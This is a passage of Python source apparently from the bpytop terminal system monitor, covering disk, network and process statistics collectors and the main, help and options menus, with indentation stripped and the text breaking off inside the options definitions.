if CONFIG.use_fstab and SYSTEM != "MacOS" and not cls.fstab_filter:
try:
with open('/etc/fstab','r') as fstab:
for line in fstab:
line = line.strip()
if line and not line.startswith('#'):
mount_data = (line.split())
if mount_data[2].lower() != "swap":
cls.fstab_filter += [mount_data[1]]
errlog.debug(f'new fstab_filter set : {cls.fstab_filter}')
except IOError:
CONFIG.use_fstab = False
errlog.warning(f'Error reading fstab, use_fstab flag reset to {CONFIG.use_fstab}')
if not CONFIG.use_fstab and cls.fstab_filter:
cls.fstab_filter = []
errlog.debug(f'use_fstab flag has been turned to {CONFIG.use_fstab}, fstab_filter cleared')
for disk in psutil.disk_partitions(all=CONFIG.use_fstab or not CONFIG.only_physical):
disk_io = None
io_string_r = io_string_w = ""
if CONFIG.use_fstab and disk.mountpoint not in cls.fstab_filter:
continue
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
continue
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
pass
u_percent = round(getattr(disk_u, "percent", 0))
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM != "BSD":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if not dev_name in io_counters:
for names in io_counters:
if names in dev_name:
disk_io = io_counters[names]
break
else:
if cls.diskutil_map:
for names, items in cls.diskutil_map.items():
if items in dev_name and names in io_counters:
disk_io = io_counters[names]
else:
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp)) #type: ignore
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp)) #type: ignore
if not disk.device in cls.disks_io_dict:
cls.disks_io_dict[disk.device] = {"read" : [], "write" : [], "rw" : []}
cls.disks_io_dict[disk.device]["read"].append(disk_read >> 20)
cls.disks_io_dict[disk.device]["write"].append(disk_write >> 20)
cls.disks_io_dict[disk.device]["rw"].append((disk_read + disk_write) >> 20)
if len(cls.disks_io_dict[disk.device]["read"]) > MemBox.width:
del cls.disks_io_dict[disk.device]["read"][0], cls.disks_io_dict[disk.device]["write"][0], cls.disks_io_dict[disk.device]["rw"][0]
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if CONFIG.io_mode or MemBox.disks_width > 30:
if disk_read > 0:
io_string_r = f'▲{floating_humanizer(disk_read, short=True)}'
if disk_write > 0:
io_string_w = f'▼{floating_humanizer(disk_write, short=True)}'
if CONFIG.io_mode:
cls.disks[disk.device]["io_r"] = io_string_r
cls.disks[disk.device]["io_w"] = io_string_w
elif disk_read + disk_write > 0:
io_string_r += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string_r + (" " if io_string_w and io_string_r else "") + io_string_w
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if cls.old_disks != list(cls.disks) or cls.old_io_disks != list(cls.disks_io_dict):
MemBox.redraw = True
cls.recheck_diskutil = True
cls.old_disks = list(cls.disks)
cls.old_io_disks = list(cls.disks_io_dict)
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[netword device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
net_iface: str = CONFIG.net_iface
sync_top: int = 0
sync_string: str = ""
address: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nics = []
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
if cls.net_iface and cls.net_iface in cls.nics:
cls.nic = cls.net_iface
cls.nic_i = cls.nics.index(cls.nic)
@classmethod
def switch(cls, key: str):
if cls.net_iface: cls.net_iface = ""
if len(cls.nics) < 2 and cls.nic in cls.nics:
return
if cls.nic_i == -1:
cls.nic_i = 0 if key == "n" else -1
else:
cls.nic_i += +1 if key == "n" else -1
cls.nic_i %= len(cls.nics)
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if sorted(cls.nics) != sorted(nic for nic in up_stat if up_stat[nic].isup):
old_nic = cls.nic
cls._get_nics()
cls.nic = old_nic
if cls.nic not in cls.nics:
cls.nic_i = -1
else:
cls.nic_i = cls.nics.index(cls.nic)
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat:
cls._get_nics()
if not cls.nic: return
NetBox.redraw = True
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
pass
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
if cls.nic in psutil.net_if_addrs():
cls.address = getattr(psutil.net_if_addrs()[cls.nic][0], "address", "")
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
case_sensitive: bool = False
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processes with pid, name, arguments, threads, username, memory percent and cpu percent'''
if not "proc" in Box.boxes: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: List[str] = []
if cls.search_filter:
if cls.case_sensitive:
search = [i.strip() for i in cls.search_filter.split(",")]
else:
search = [i.strip() for i in cls.search_filter.lower().split(",")]
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd,
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: List[str]):
'''List all processes in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
pass
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd,
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key in ["right", "l"] else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Cycle view presets, order: full->proc->stat->user.",
"(1)" : "Toggle CPU box.",
"(2)" : "Toggle MEM box.",
"(3)" : "Toggle NET box.",
"(4)" : "Toggle PROC box.",
"(d)" : "Toggle disks view in MEM box.",
"(F2, o)" : "Shows options.",
"(F1, shift+h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up, k) (Down, j)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left, h) (Right, l)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(s)" : "Toggle showing swap as a disk.",
"(i)" : "Toggle disks io mode with big graphs.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f, /)" : "Input a NON case-sensitive process filter.",
"(shift+f)" : "Input a case-sensitive process filter.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (shift+t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (shift+k)" : "Kill selected process with SIGKILL - 9.",
"Selected (shift+i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "H", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
selected_cat: str = ""
selected_int: int = 0
option_items: Dict[str, List[str]] = {}
cat_list: List[str] = []
cat_int: int = 0
change_cat: bool = False
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
categories: Dict[str, Dict[str, List[str]]] = {
"system" : {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
